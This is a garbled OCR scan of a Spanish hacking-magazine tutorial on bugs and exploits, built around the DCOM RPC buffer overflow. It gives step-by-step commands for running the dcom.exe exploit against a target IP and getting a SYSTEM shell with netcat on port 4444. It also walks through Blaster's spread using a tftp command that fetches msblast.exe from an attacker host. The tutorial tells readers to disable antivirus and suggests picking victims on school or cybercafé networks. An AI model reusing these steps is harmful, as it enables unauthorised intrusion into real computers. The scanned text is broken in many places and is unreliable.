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Registro de dominios por sólo 15 €/año mejores centros de datos de España, nuestro personal altamente cualificado y 
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Los precios indicados no incluyen IVA 16% 
Los importes y caracteristicas pueden variar sin previo aviso 
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Si en el número pasado de PC PASO A PASO no te quedó claro el tema de los explo.ts. espera 
a leer este artículo. Más claro y sencillo IMPOSIBLE 
Aprenderás a utibzar un exploit y conseguir una shell remota en un “PC Víctima” 


0.- Introducción: 


Hola amigOs, algunos ya me conoceréis de los foros de 
HaCKxCRacCK (www.hackxcrack.com), sin duda uno de los 
mejores lugares donde podrás aprender infinidad de cosas 
sobre la informática en sí y por supuesto uno de los mejores 
foros para pasar un buen momento con la mejor gente del 
mundo, que hacen que el foro sea un verdadero sueño 
para todos, a todos ellos una y mil veces más ¡¡GRACIAS!! 


En este artículo sobre bugs y exploits nos acercaremos 
a estos bichitos y diablillos. Os explicaré el significado de 
cada término y unas cuantas cosillas más, pero seguramente 
por lo que más te vas a interesar, es por las practicas que 
vamos a realizar.... 


Te enseñare paso por paso cómo se copia el Blaster en 
un PC, como defenderte ante él, como entrar en equipos 
remotos que se encuentren en ethernet e Internet... Te 
enseñare a hacer un D.O.S. a cualquier máquina operativa 
de ethernet e Internet... 


Aunque tenía pensado explicar otro tema en la segunda 
práctica de este artículo, al final tendremos que aplazarlo 
al mes que viene por falta de espacio. El proximo mes 
explicaré un bug y un exploit actual y algo del gusano 
“Sasser” que actúa bajo esta vulnerabilidad... Y todo gracias 


a los bugs y exploits 


1.- ¿Qué es un Bug? 


La palabra Bug en inglés significa “bicho o insecto de 
pequeño tamaño”, según el New Hacker's Dictionary (32 
ED: 4.0.0, MIT Press, 1996). 


La aparición de dichos bichos, comienza en los tiempos en 
que las computadoras ocupaban habitaciones enteras. Las 
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esos tiempos (sobre 1948), la primera aparición 
documentada de la palabra bug en informática se produjo 
cuando un insecto (bugs = bichos) se introdujo en un relé 
de una máquina del Naval Surface Warfare Center, 
provocando un error. 


En realidad, bug se utiliza para cualquier tipo de transtorno 
en una máquina. Se remonta al siglo XIX, a la época del 
telégrafo. De ahí pasó a la electricidad (se encuentra en 
un manual popular de 1896), estaba en uso en radares 
durante la Segunda Guerra Mundial... 


Bug significaba cualquier funcionamiento anómalo de una 
maquina o un circuito, causado por un insecto o no, por 
eso fue adoptando rápida y profusamente por el mundo 
informático (donde abundan las sorpresas desagradables 
en los programas). Por eso, actualmente cuando un software 
(programa) tiene un fallo, se dice que contiene un bug o 
error. 


Hoy en día es muy común encontrar como significado de 
bug: agujero o fallo de seguridad que contiene un software 
(programa) en momento de ejecución, y que nos permite 
obtener el control sobre PCs remotamente a través de 
ethernet o Internet. 


Pero esto no es del todo cierto, ya que un bug puede ser 
tanto un agujero o falla de seguridad, como un error que 
provoque un mal funcionamiento del programa o la 
finalización de dicho programa, entre otras muchas 
posibilidades. 


Normalmente, a aquellos a los que solucionan estos errores 


se les llama debuggers, que viene a significar algo como 
“solucionadotes” de bugs / errores. 
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2.- ¿Cómo se encuentran los bugs? 


Cuando un programa es distribuido (ya sea de forma 
gratuita, libre o privada), es normal que se encuentren 
vulnerabilidades importantes. Es muy común hoy en día 
que las primeras versiones de un programa contengan gran 
cantidad de bugs. 


Esto es debido fundamentalmente a: 


b Una mala programación. 
> Unas insuficientes pruebas de funcionamiento. 


Digamos que cuando un programa (por ejemplo un Sistema 
Operativo como "tu querido Windows”) cae en manos de 
los investigadores (es decir, de verdaderos hackers), estos 
investigan el funcionamiento interno de dicho programa. 


Hacen infinidad pruebas y descubren errores (bugs). 

También crean programas que demuestran: 
» por un lado la existencia de estos bugs 
b y por otro cómo una persona malintencionada podría 
beneficiarse del mismo... ya sabes... la obtención de 
shells (la famosilla ventana negra), D.O.S (denegación 
de servicios), buffer overflows (desbordamientos de 
pila)... 


3.- ¿Qué Sistema Operativo contiene más 
bugs? 


Según la firma mi2g, especializada en seguridad 
informática, afirma que el 44 % de los bugs (agujeros de 
seguridad) reportados en los últimos 10 meses pertenece 
a productos de Microsoft, seguidos de Linux con un 19% 
de las vulnerabilidades. Lejos queda Mac OS, de Apple, 
que sólo concentra el 1,9 % de los agujeros de seguridad 
informados. 


4.- ¿Qué es un exploit? 


Ahora sí que sí Y Definir el término exploit en una revista 
como esta puede provocar que algunos dejen de comprarla 
para siempre (típica definición lamer) y otros se queden 
boquiabiertos (típica explicación técnica de un par de 
páginas que nadie llega a entender). 


Nosotros vamos a definir el término exploit “a nuestra 
manera”, nada mejor que un ejemplo simple pero directo: 
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Imagina que eres el afortunado propietario de un 
decodificador del CANAL+. Como no tienes mucho dinero, 
solo contrataste el PACK BÁSICO, es decir, que solo ves 
unos 20 canales de los 200 que hay (mal rollo, ¿verdad?) 


El decodificador tiene en su interior una serie de rutinas 
(programas) que te permiten decodificar la señal de tu 
pack contratado (una birria de pack). Imagina que los 
programadores no son muy buenos y hubiesen cometido 
muchos errores al programar las rutinas que controlan el 
decodificador. 


Imagina que (ya se que soy pesado, pero la imaginación 


es buena *), un buen día, vienen tus primos de visita 
(esos “odiosos” diablillos de 5 años) y empiezan a “aporrear” 
los botones del mando de tu decodificador. Para tu sorpresa, 
a partir de ese momento puedes ver TODOS los canales, 
los 200 canales!!! 


Existe un error en las rutinas del decodificador (un bug), 
y tus “queridos primos” han sido capaces de sacarle un 
provecho a ese error mediante una serie de acciones 
(pulsar una determinada combinación de botones). Esa 
serie de acciones es un exploit. 


Esperamos que incluso los más puristas acepten este 
ejemplo y, por extensión, esta definición. Sabemos que 
es SIMPLE con mayúsculas (ridículamente SIMPLE), pero... 


¿verdad que todos lo hemos entendido? Y 


Si queremos profundizar en el tema nos encontraremos 
con todo tipo de posturas (algunas muy radicales) y 
montaremos un debate de los “calentitos”, de los que 
suelen acabar “a tortazos”. 


Algunos llegan incluso a defender posturas, digamos... 
“interesantes”. Por ejemplo diciendo que un exploit es una 
“capacidad añadida a un programa”, es decir, que los 
programadores de la rutina del decodificador pusieron ahí 
(consciente o inconscientemente) esa posibilidad y que 
por lo tanto ES LEGAL utilizar el exploit y ver los 200 
canales sin pagar!!! Hombre... es una manera de verlo... 
pero recuerda lo siguiente (que LA LEY lo tiene muy claro): 


“Recuerda que la utilización de un exploit sin la 
supervisión / aprobación del administrador del sistema 
puede ser considerado (lo es) un delito y está penado 
con fuertes multas y/o prisión/cárcel” 
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En la revista PC PASO A PASO número 23 pudiste meterte 
de lleno en este tema y “mancharte las manos” Y 


LAS PRACTICAS: 


1.- Introducción: 


Ahora que ya hemos “hablado” un poco sobre los bugs y 
los exploits, empezaremos con las prácticas. 


En estas prácticas YO utilizare dos equipos con Windows 

XP profesional, dentro de una red casera conectados por 

un switch... pero para realizar las prácticas no te hará falta 

que tengas dos PCS, bastara con uno en el que corra un 
sistema Windows XP / w2k. 


Si dispones de... 


Si dispones de piezas sueltas (restos de anteriores PCs) 
suficientes para motar un PC y no sabes por donde empezar, 
pásate por los foros de hackxcrack (www.hackxcrack.com) 
y en la sección F.A.Q encontraras un hilo: “GUIA: Montado 
PCS desde 0, (HARDWARE)”, ahí podrás encontrar cómo 
montar PCs muy fácilmente con unas piezas mínimas. 


Cito esto ahora porque, durante varios artículos de la revista, 
sería de gran ayuda disponer de varios PCS para entender 
perfectamente los artículos y poder meterte más en las 
prácticas. Y en este artículo te recomiendo que puedas 
hacer las prácticas en una red de dos PCs, por temas de 
reinicio del S.O... 


2.- ¿Cómo se copia el MBlaster en un PC? 


Antes de nada, parto con la idea de que todos conocéis o 
sabéis quien es BLASTER. Si eres de los despistadillos, o 
mejor dicho, de los Súper despistadillos que no sabe nada 
del tema, pásate por www.google.com y entérate de que 
va el asunto... 


MBlaster es un virus / gusano... que se aprovecha de un 
bug de los sistemas operativos de Microsoft en sus versiones 
XP/w2k/2003. Se aprovecha de una falla en el RPC (Remote 
Procedure Call, en castellano Llamada de Procedimiento 
Remoto). 
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El RPC es (simplificando mucho el tema) un protocolo de 
los S.O. Windows para que un software que se inicia en 
una máquina sea accesible a los servicios de otra máquina 
conectado en red. 


El bug se manifiesta a la hora del intercambio de solicitudes 
(mensajes) entre dos PCS donde uno actúa de servidor y 
otro de cliente. Debido a un insuficiente control sobre el formato 
de estos mensajes, un usuario malintencionado puede crear 


un mensaje que provoque “efectos no deseados” % 


Los puertos por los que interactúa o escucha este protocolo, 
son los puertos 135 en TCP / UDP y 139, 445, 593 en TCP. 


La forma en que los exploits se aprovechan de este bug 
es enviando un código malicioso, que junto con el mal 
control del formato, hace que se produzca los conocidos 
Buffers Overflows (desbordamientos de pila), después es 
insertado un código que nos permite poder obtener una 
shell de system32. 


Ahora que ya sabemos en que consiste esta vulnerabilidad, 


como dicen en mi pueblo, “poñamos as mans a obra Y ” 
(Pongamos manos a la obra). 


El MBlaster se aprovecha de este bug gracias a un EXPLOIT 
que ahora voy a comentar y a explicar para que luego 
puedas entender las prácticas del MBLASTER. 


3.- Aprendiendo a utilizar el exploit 
dcom. final: 


El exploit que vamos a utilizar es conocido, por lo menos 
por mí, como dcom_final, el nombre viene de: DCOM 
(Distributed Component Object Model, en castellano 
Componente Modelo de Objeto Distribuido), que viene a 
ser es un protocolo que proporciona un conjunto de 
interfaces a los clientes y servidores para comunicarse 
entre sí. 


¿Por que este nombre “dcom_final”? Porque en realidad 
el bug afecta a la interface DCOM (y lo de final, no hace 


falta mencionarlo xDDD). 


Podrás descargarte el exploit en: (ejecutable compilado) 


http://www.cyruxnet.org/download/rpcdcom/dcom_final.zip 
También podrás encontrarlo en http://www.hackxcrack.com 
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Si te fijas, el EXPLOIT viene comprimido en formato zip, 
yo lo voy a descomprimir en la siguiente ruta: 
“Cildcom_final” 


Si dispones de... 


Si tienes un antivirus funcionando, vas a tener que 
desactivarlo para hacer las prácticas, porque empezará a 
cantar como un loco, y según el antivirus (caso del Panda) 
puede eliminarte el exploit. Pero tranquilo que esto no es 
ningún virus. 


Si te fijas, dentro de la carpeta dcom_final encontraras un 
ejecutable: dcom.exe (te lo repito, NO ES UN VIRUS, NO 
CORRES PELIGRO por mucho que tu antivirus lo detecte 
como tal ¿vale? 


Si lo intentas ejecutar con los dos clicks de siempre, veras 
que se ejecuta una ventana negra pero que al cabo de 
unas décimas de segundo la ventanita negra finaliza, 
tranquilos que esto es normal... 


Para ejecutar el exploit tendremos que ejecutarlo 
mediante una consola (llámalo como quieras: cuadro 
de comandos, “ventanita negra”, ventana MS-DOS, 
SHELL...), creo que ya todos sabréis de que estoy hablando 
porque en la revista ha salido esto mil y una veces. Estoy 
hablando de cmd.exe (Interprete de comandos). 


Venga, ejecuta la consola, ¿Cómo?... ¿Qué no sabes 
como...? Pues es muy sencillo: pulsa sobre el “botón inicio” 
luego sobre “ejecutar...” escribe “"cmd.exe” y pulsa enter, 
y así ya tenemos nuestra famosa ventanita negra... 


Lo siguiente que debemos hacer es acceder a la ruta donde 
hemos descomprimido el exploit (dcom_final): 


> escribe en la ventanilla negra “cd” y luego la ruta 
donde tienes el exploit (en mi caso "c:Ydcom_final”). 
Entonces, yo tendré que escribir “cd c:1dcom_final” 
(y pulsamos enter). 


Ahora hacemos un “dir” para saber como se llama el 
exploit, DCOM.exe. Pues venga, escribe “dir” (y pulsa 
enter). 


Ahora que ya estamos en la ruta necesaria y ya sabemos 
cómo se llama el exploit, ejecutémoslo. ¿Cómo...? Pues 
simplemente escribiendo el nombre y su extensión, 
venga, escribe “dcom.exe” (y pulsa enter). 


Al ejecutar el exploit nos aparecerá esto: 
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D:IWWINDOWSISystem32lcmd.exe 


01/05/2004 17:18 <DIR> 
B1/05/2004 17:10 <DIR> 
31/07/2003 11:57 
1 archivos 155.732 bytes 
di 2.168.689.152 bytes libres 


155.732 dcom.exe 


¡dcom_final>dcomfinal 


programa o archivo por lotes ejecutable. 


'"dcomfinal"” no se reconoce como un comando interno o externo, 


final>»dcom.exe 


te DCOM RPC Buffer Overf low Explo 
Original code hy FlashSky and Benjurry 


— Rewritten by HDM <hdn [at] metasploit.com> 


Ported to Win32 hy Benjamin Lauzibre <blauziere lat] altern.org> 
iversalized for kiddie extravaganza by da harabas 
dcom.exe <Target ID> <Target IP> 


B Windows 2808 
1 Windows XP 


zidcom_final> 


Nota para novatos 


NOTA PARA NOVATOS (y a mucha honra con eso de 
novatos, todos somos eternos aprendices): 


Si no sabes qué es eso de las extensiones de los archivos, 
es hora de que te vayas enterando... 


Todos los archivos en sistemas Windows están compuestos 
por: 
> un nombre (por ejemplo “setup”) 
> un punto “.” 
b y una extensión (hay muchas, por ejemplo la 
conocidísima “exe”) 
D» RESULTADO: setup.exe 


El nombre nos sirve para que tanto los usuarios como el 
mismo ordenador sepan distinguir los distintos archivos 
dentro de un mismo directorio. El “.” le sirve al ordenador 
pasa saber que a partir de él se termina el nombre del 
archivo y que la siguiente cadena es la extensión. La 
extensión le sirve al ordenador para saber con qué tipos 
de archivos vamos a trabajar (ejecutable, librerías, imágenes, 
etc.). 


Por ejemplo, los archivos terminados en: 


FeXO =---- > Simbolizan un ejecutable 
* pg ------ > Simbolizan una imagen 
FAX Í > simbolizan un texto 


Y todavía quedan más, cada extensión tiene un objetivo 
simbólico. En nuestro caso el exploit es un ejecutable, es 


Página 7 


Los Bugs y los Exploits - Los Bugs y los Exploits - Los Bugs y los 


decir, su extensión es *.exe. 


Te recomiendo que si no tienes ni idea sobre el tema, que 
te leas algo sobre él, es muy interesante y muy básico. Para 
encontrar información www.google.com 


Apunte Importante: Si cuando accedes a una carpeta 
con un montón de archivos NO PUEDES VER SUS 
EXTENSIONES, es porque nuestro querido Bill Gates 
oculta las extensiones por defecto. Pásate por el foro y 
pregunta cómo se puede hacer para que el Windows muestre 
las extensiones de los archivos. No merece la pena gastar 


páginas en explicarlo y, de paso, conoces a la peña del 


foro (www.hackxcrack.com) 


Ahora ya hemos ejecutado el exploit, pero aun no lo 
hemos lanzado contra nadie. Para hacer un ataque 
necesitamos saber como mínimo dos cosas: 


b ¿Qué sistema operativo tiene la victima? 
b ¿Qué IP tiene la victima? 


En mi caso la “victima” (el PC que va a ser atacado) tiene 
un Windows XP y la IP 192.168.0.2 


Si quieres... 


Si quieres hacer las prácticas en un solo PC, la víctima eres 


tú mismo (es decir, el PC que estés utilizando). En este 
caso la IP deberá se obligatoriamente la 127.0.0.1 y el 
Sistema Operativo, el que tengas, obvio. Si no sabes por 
qué la IP debe ser obligatoriamente la 127.0.0.1, te 
recomiendo leer artículo de TCP/IP que hay en este mismo 


número Y 


Si estas practicando en una red (como la del colegio o la 
de un caber) y no sabes la IP del PC víctima, solo tienes 
que abrir otra ventanilla negra y poner “Net view”. Ahí te 
aparecerán todos los PCS que pertenecen al grupo de 
trabajo y que se encuentran operativos en este momento. 
Normalmente todos tienen un nombre con un nY, para 
poder diferenciar unos de otros, aunque no tiene porque 
ser así... 


Imagínate que el nombre de la víctima que quieres atacar 
es AE2, entonces tendrás que hacerle un Ping para sacar 
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su IP. ¿Cómo? Muy sencillo, escribe en la shell (pantallita 
negra) “Ping AE2” (y pulsa enter). Si te fijas aparecerán 
unos números separados por puntos, esa es la IP de la 
víctima, aquí tienes un ejemplo con la víctima “HACK”: 


D:WINDOWS1System32lcmd.exe 
(C> Copyright 1985-2001 Microsoft Corp. 


(nl xl 


D:xDocuments and SettingsMAdministrador.NETTING>net view 
Se ó 


ACK 
ANNETT ING 
Se ha completado el comando correctamente. 

D:xDocuments and SettingsMAdministrador.NETTING>ping HACK 
Haciendo ping a HACK [192.168.8.21 con 32 bytes de datos: 
ta desde 192.168.0 


ta desde 192.168.9 
192.168 


=32 tiempo<iím TTL=128 
=32 tiempo<ím TTL=128 
tiempo<ím TTL=128 
tiempo<ím TTL=128 


spuesta desde 192.168. 


ping para 192.168. 
ados = 4, recibi E] 
xi e ida y vuelta en milisegundos: 
Mínimo = ms. Máximo = Úms. Media = Uns Y 


Lo que se encuentra encuadrado es la IP del PC “HACK”. 
“HACK”es el nombre del host (PC) víctima al cual hemos 
lanzado el ping. 


Ahora ya estamos preparados para lanzar el exploit. 
Tendremos que poner en la shell lo siguiente: 


“dcom.exe <TARGET ID> <TARGET IP>” 


b “dcom.exe” se utiliza para que la shell sepa quién 
es el guapo que va a ejecutar los parámetros que van 
a continuación del programa que vamos a ejecutar (el 


guapo *%), en este caso <TARGET ID> <TARGET 
IP>" 


b “<TARGET 1ID>” Es una variable numérica que el 
exploit (dcom.exe) utiliza, para saber qué Sistema 
Operativo tiene la víctima, solo hay dos posibilidades: 
b “0” Windows w2k (Windows 2000) 
b y “1” Windows XP. 


b “<TARGET IP>”" Es la variable que le indica al exploit 
qué IP debe atacar. 


Es decir, que lo que tenemos que escribir en la shell 
(ventanita negra) es: 
“Dcom.exe 1 192.168.0.2" 


Bueno, esto es en mi caso, en el tuyo solo tienes que 
sustituir el <target ID> por “0” (en caso de que ataques 
a un Windows w2k) y la IP de la víctima por la 
correspondiente (si solo tienes tu PC, recuerda que la IP 
debe ser 127.0.0.1). 


Si todo ha ido bien, el exploit nos mandara un mensaje 
como este: 


PC PASO A PASO N* 24 


E D:IWINDOWSWSystem32lcmd.exe 


ICzxdcom_final>dcom.exe 


Remote DCOM RPC Buffer Overf low Exploit 
Original code by FlashSky and Bi po 

Rewritten by HDM <hdm [at] meta: 
Ported to Win32 hy Benjamin Lau: 


Ed 
oit.com> 
Pre <blauziere latl altern.org> 
Universalized for kiddie extravaganza by da barabas 
Usage: dcom.exe <Target ID> <Target 1 


8 Windows 2808 
1 Windows XP 


2dcom_final>dcom.exe 1 192.168.8.2 


Remote DCOM RPC Buffer Overf low Exploit 
Original code by FlashSky and Benjurry 
Rewritten by HDM <hdm [atl metasploit.com> 
Ported to Win32 by Benjamin Lauzibre <blauziere [at] altern.org> 
Universalized for kiddie extravaganza by da harabas 
CiUsina return address of 4x0100139d 
fUse Netcat to connect to 192.168.0.2:4444 


ICzxdcom_final> | 


El mensaje es el que esta en el rectángulo de color verde, 
viene a ser donde se va a producir el Buffer Overflow, para 
que el exploit sepa en que dirección debe atacar/actuar. 


Si te fijas he seleccionado con otro rectángulo de color 
rojo, otro mensaje que nos manda el exploit, esto nos 
quiere decir que mandemos un Netcat a la IP 192.168.0.2 
(en mi caso) por el puerto 4444 (en el caso de todo el 
mundo). 


En otros números... 


En otros números de PC PASO A PASO ya se ha explicado 
cómo utilizar netcat. En este artículo simplemente tienes 


que seguir nuestros pasos, pero si tuvieses algún tipo de 


duda posteala en el foro (www.hackxcrack.com). 


Puedes descargarte el programa NETCAT desde la Web 
de Hack x Crack, para que no te pierdas ---> 


http://www. hackxcrack.com/programas/nc.zip 


Pues vamos al tema. Tenemos que lanzar un netcat a la 
IP 192.168.0.2 en el puerto 4444. Para hacer esto: 
> abre otra shell (exactamente igual que hicimos 
antes, con esta ya tendremos dos ventanitas negras en 
nuestro escritorio) 
> escribe en la nueva ventanilla negra “cd” y luego la 
ruta donde tienes has descomprimido el netcat (en mi 
caso “c:1netcat”). Entonces, yo tendré que escribir 
“cd c:1netcat” (y pulsamos enter). 
> escribe dir y pulsa enter (igual que antes), de esta 
forma podrás ver que hay un archivo llamado nc.exe. 
Sí, lo has adivinado, ese archivo es el NETCATY 


> escribe nc IP-Victima 4444” y pulsa enter. En mi 
caso escribiré nc 192.168.0.2 4444 
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Ni se te pase... 


Ni se te pase por la cabeza cerrar la ventana donde está 
corriendo el EXPLOIT, pues si cierra esa ventana NO 
podremos conseguir una shell de system32. Recuerda que 
hemos dicho que ahora deben haber dos “ventanitas negras” 
en tu escritorio. 


Si te fijas, al ejecutar la instrucción nc 192.168.0.2 
4444”, el netcat nos proporciona una shell de system32: 


¡BE D:WINDOWS1System32lcmd.exe - nc 192.168.0.2 4444 => [af x 
18/04/2804 28:47 551.536 montando_pc.pdf 
49/04/2004 28:16 1.288.419 umware .pdf 
49/04/2004 28:21 <DIR> izhal 

33 archivos 24.110.911 bytes 

38 dirs 49.224.704 bytes libres 


El volumen de la unidad G no tiene etiqueta. 
El número de serie del volumen es: FB61-6A39 


Directorio de 


25/01/2004 21: - 
25/01/2004 21: a 
103/61/1998 15: 59.392 nc.exe 

59.392 hytes 
49.224.704 bytes libres 


1 archivos 
2 dirs 


IG3NNC>nc 192.168.B.2 4444 
Microsoft Windows XP [Vers 
<(C> Copyright 1985-2061 Mi 


n 5.1.26081 
rosoft Corp. 


IC3NWINDOWS Ns ystem32> 


Nota para novatos 


NOTA PARA NOVATOS (y de nuevo, a mucha honra con 
eso de novatos, que todos somos eternos aprendices): 


Aunque te parezca que la “ventanita negra” que tienes 
delante no ha cambiado prácticamente en nada, existe una 
diferencia MUY IMPORTANTE: Acabas de entrar en el 
PC 192.168.0.2 


A partir de ahora, cualquier comando que introduzcas 
en esa ventana será ejecutado en el PC 192.168.0.2. Si 
por ejemplo haces un simple dir, el listado de archivos que 
obtendrás no será los que tienes en tu PC, sino los del PC 
VICTIMA. ACABAS DE CONSEGUIR UNA SHELL 
REMOTA !!! 


Como novato (o no), en Internet habrás encontrado una y 
mil veces la siguiente pregunta: ¿qué es una shell? ¿Cómo 
puedo conseguir una cuenta shell? ¿cómo puedo hackear 
un PC mediante un exploit y obtener un acceso a un sistema 
por línea de comandos? y bla, bla, bla!!! 
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Las respuestas a este tipo de preguntas suelen ser de lo 
más “divertidas” Y Tú ya nunca tendrás que enfrentarte 
a esas preguntas y sus “divertidas” respuestas: Tú acabas 
de utilizar un exploit a partir del cual (y gracias al netcat) 
has conseguido un acceso shell remoto. 


Ruego paciencia a los veteranos de la revista, pero debemos 
ser conscientes de que mucha peña hace tiempo que está 
perdida. Los nuevos lectores se encuentran con textos que 
prácticamente es como si les hablasen en una “lengua 
muerta”... ya, ya... no se han leído las revistas anteriores... 
pero también debemos tenerles en cuenta. 


Pues a partir de aquí solo tienes que echar tu cabeza a 
funcionar, porque ya tienes un control más que suficiente 
para hacer lo que quieras en la víctima, como en su 
momento hizo el creador del MBlaster (en el siguiente 
punto te enseñare como actúa el MBlaster). 


Pero antes recordarte unas cuantas cosillas muy importantes, 
¡¡estate atento!!. 

Para salir de la shell que el netcat nos a proporcionado 
debemos escribir “exit” o pulsar la cruz de la ventanita 
negra. En ese instante se producirá un D.O.S. 
(denegación de servicios) en la máquina Víctima, en 
otras palabras, que le saltara una ventana como esta: 


CT e. 1 imagen se verá 


Se está apagando el sistema. Guarde todo 
trabajo en curso y cierre la sesión. Se perderá 
cualquier cambio que no haya sido guardado. 


un cronometró que al 


El apagado ha sido iniciado por NT le coi a Era 
AUTHORITYASYSTEM provocara que el PC 
Víctima sea 


reiniciado. Lo que 
provoca el D.O.S en 
la máquina víctima es 
la finalización de la 
shell donde corre el 
netcat. 


Tiempo restante 


para el apagado : 00:00:53 


— Mensaje 


| Windows debe reiniciar ahora porque el 
| servicio Llamada a procedimiento 
| remoto[RPC] terminó de forma inesperada 


Si tu equipo (atacante) no esta parcheado contra este bug, 
solo podrá hacer un ataque por cada vez que sea reiniciado, 
es decir, que solo podrá atacar a una máquina una vez. 


Si tu equipo quiere atacar a otras máquinas deberá 


reiniciarse. Esto es debido a que cuando se lanza el exploit 
y se cierra, los puertos quedan "*fritos” tanto los de la 
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máquina atacante como los de la máquina víctima, excepto 
si el atacante está parcheado, entonces podrá realizar 
numerosos ataques. 


Con esto ya hemos terminado este punto, y ahora que ya 
sabes utilizar el exploit te vas a divertir mucho con el 
siguiente apartado, donde podrás usar lo explicado para 
hacer "tus cositas”. 


4.- ¿Cómo se copia el Blaster desde un PC 
a otro PC? ¿Cómo es posible que este virus 
se transmita de un PC a otro PC sin que 
nadie se de cuenta? Ni siquiera es necesario 


que el usuario ejecute un archivo o abra 
un e-mail!!! 


Esta es una de las típicas preguntas que ningún informático 
desea contestar. Sí, bueno, hay respuestas tipo “estándar”, 
que si es debido a los agujeros del sistema, que si son 
errores que permiten la entrada de código malicioso, que 
si los hackers son muy malos, que si las puertas traseras... 


NO!!! Ninguna de esas respuestas responde a la 
pregunta. De hecho, es IMPOSIBLE que una persona 
cualquiera (sin los conocimientos adecuados) entienda la 
respuesta que puedas darle. Nosotros vamos a explicarlo, 


como siempre, con ejemplos Y 


Lo explicado... 


Lo explicado a continuación no pretende ser una descripción 
técnica del funcionamiento del virus BLASTER, rogamos 
que “los puristas” nos disculpen por las licencias que nos 
tomaremos desde ahora hasta el final del artículo. 


Nuestra intención es hacernos entender!!! (o al menos 
intentarlo +) 


Pongámonos en situación: 
> Tenemos un PC Infectado por el BLASTER y, por 
supuesto, su dueño no tiene ni idea. 
b Tenemos un PC Víctima esperando ser infectado 


PASO 1: Desde un PC Infectado, lo primero que hace el 


Blaster es escanear unos determinados rangos de IPS y 
mirar si los PCs que hay tras esas IPs son vulnerables. 
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] 
as 
PC NO VULNÉRABLE 


1 


A 
SERA 


[| 


I VULNERABLE 
'TURA VÍCTIMA :) 
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* er 
/ PC INFECTADO NX 
. 


PE 


CAE, 7 
PC is ABLE Ni 2) ] / 
] > PO NO VULNERABLE 
SE be novunneraBLe 
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PASO 2: El PC Infectado finalmente localiza a un PC 
Vulnerable. Al PC Infectado a partir de ahora lo 
llamaremos PC Atacante, puesto que iniciará un ataque 
contra el PC Víctima. 


¿Qué tipo de ataque? Pues lo que hará el PC Atacante es 
mandar al PC Victima el exploit que hemos estudiado en 
este mismo artículo, exactamente igual que hemos hecho 
nosotros antes Y 


PASOJ2 


ua 
) 
PLA 

PC ATACANTE 


PASO 3: Una vez lanzado el exploit sobre la víctima, se 
obtiene una shell remota tipo system32, es decir: 
b se lanza el Exploit (PASO 2) 
b y después se usa el netcat para obtener una shell 
remota (PASO 3) 


Todo exactamente igual a lo que hicimos en este mismo 
artículo, la única diferencia es que el PC INFECTADO no 
muestra ninguna ventanita, todos los pasos son automáticos 
y todo lo hace en modo oculto. 


Piensa que el virus BLASTER es un programa como cualquier 
otro, el código del BLASTER abre y ejecuta programas en 


modo oculto, como todos los virus Y 


A partir de este momento, el virus BLASTER (PC Infectado) 
tiene el control total del PC Victima gracias al shell remoto, 
exactamente igual que hicimos nosotros (y no me cansaré 


de repetirlo %). 


PC PASO APASO N* 24 


Le 
PC ATACANTE 


PASO 4: Ahora el BLASTER puede hacer lo que quiera 
con su víctima a base de comandos. Podría hacer un dir 
y enviar el listado de archivos del PC Victima a un FTP del 
Polo Norte, borrar archivos, hacer que se abra una página 
concreta en el Internet Explorer, ... ... ... pero NO, el 
programador del virus desea que su virus se propague 
por todo el mundo de forma automática, así que... ¿Qué 
hace el Blaster entonces? Pues copiarse en el PC de la 


víctima... Y ... ¿Cómo...? 


1. Mediante la shell de system32 y en la ruta 
predeterminada (“c:1windows1systen32”), el Blaster 
se prepara para ejecutar en el PC Víctima un servicio 
predeterminado de Windows, en concreto un Cliente 
TFTP. 


Sí, el ya conocido tftp.exe explicado en el n% 2 de los 
cuadernos de HackxCrack... ahhhhhiii que tiempos 
aquellos... 


2. Blaster tiene montado un Servidor TFTP en el 
PC Atacante (en este caso con una IP 62.57.25.112) 
escuchando por el puerto 69. 

¿Y qué hace un Cliente TFTP con un Servidor TFTP?% 


3. El BLASTER, mediante la shell remota, hace que 
el PC víctima (mediante el Cliente TFTP) “se coja” el 
archivo msblast.exe que se encuentra en el Servidor 
TFTP32. Lógico ¿verdad? 


Esto lo hace introduciendo en la shell remota el 
siguiente comando: 


c:YwindowsYsystem32> tftp.exe  -1i 
IP_del_servidor_a_la_escucha get 
nombre_del_archivo_a_subir 


Donde tftp.exe es el Cliente TFTP que hay en todos 
los sistemas Windows. En este caso estamos ejecutando 
el Cliente TFTP de la víctima (es un archivo llamado 
tftp.exe que está en la ruta c:1windows1system32). 


Donde -i se especifica en el modo de transferencia de 
binario. En modo binario el archivo se transfiere 
literalmente byte a byte. 
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Donde IP_del_servidor_a_la_escucha es la IP del 
host a la escucha. Es la IP del PC ATACANTE, que tiene 
un Servidor TFTP activado. Este Servidor TFTP tiene el 
archivo msblast.exe (una copia del virus Blaster) 


preparadito para ser servido Y 


Donde get se utiliza para “coger” el archivo X del host 
a la escucha y “pegarlo” en el host víctima. (El caso 
inverso seria PUT, que haría la misma función que GET 
pero al revés, por si quisiésemos “robar” un archivo de 


la víctima y copiarlo en el PC Atacante *%) 


Donde nombre_del_archivo_a_subir es nombre del 
archivo que deseamos copiar en el PC Victima (en este 
caso msblast.exe). 


Como ya hemos dicho, una vez ejecutada esta instrucción 
(en nuestro caso sería tftp.exe -i 62.57.25.112 get 
msblast.exe), el archivo msblast.exe “subirá” al PC 
Víctima. 

4. El BLASTER (PC Atacante, mediante la shell remota, 
ejecutará el comando start (comenzar, empezar) 
nombre_del_archivo. En nuestro caso particular 
ejecutará el comando “start msblast.exe”. 


En ese instante el PC Víctima es infectado por el virus 
BLASTER. Una vez el PC Víctima sea reiniciado pasará 
a comportarse como el PC Atacante y vuelta a empezar. 
En poco tiempo, este virus azotó TODO EL PLANETA 
(sistemas Windows, por supuesto). 


*PC ATACANTE 3] ¿qn 


** 1P 62.57.25.112 


** Servidor TFTP 
con el archivo 4 


"preparadito" 


5.- En verdad, ¿Qué NO es el MBlaster? 


¿Porque este apartado? Por que mucha gente confunde lo 
que es el virus BLASTER en sí con la forma de autocopiarse... 


D.O.S, Denegación de servicios); pero eso no es cierto. En 
realidad lo que provoca un D.O.S en la víctima es la 
desconexión de la shell del netcat, NO el “virus” en sí. 


6- Esquivando MBlaster / dcom final 
¡¡MANUALMENTE!! 


En este punto aprenderemos a esquivar a MBlaster o al 
Exploit dcom_final con una simple línea con netcat... 


¿Cómo se hace esto...? Muy simple, la verdad es que no 
tiene mucha ciencia, pero es muy interesante, ya veras 
porqué... 


Si te acuerdas, cuando te explique el exploit Dcom_final, 
te dije que teníamos que lanzar un netcat al host víctima 
por el puerto 4444, ya que este es siempre el puerto 
que usa el dcom_final. 


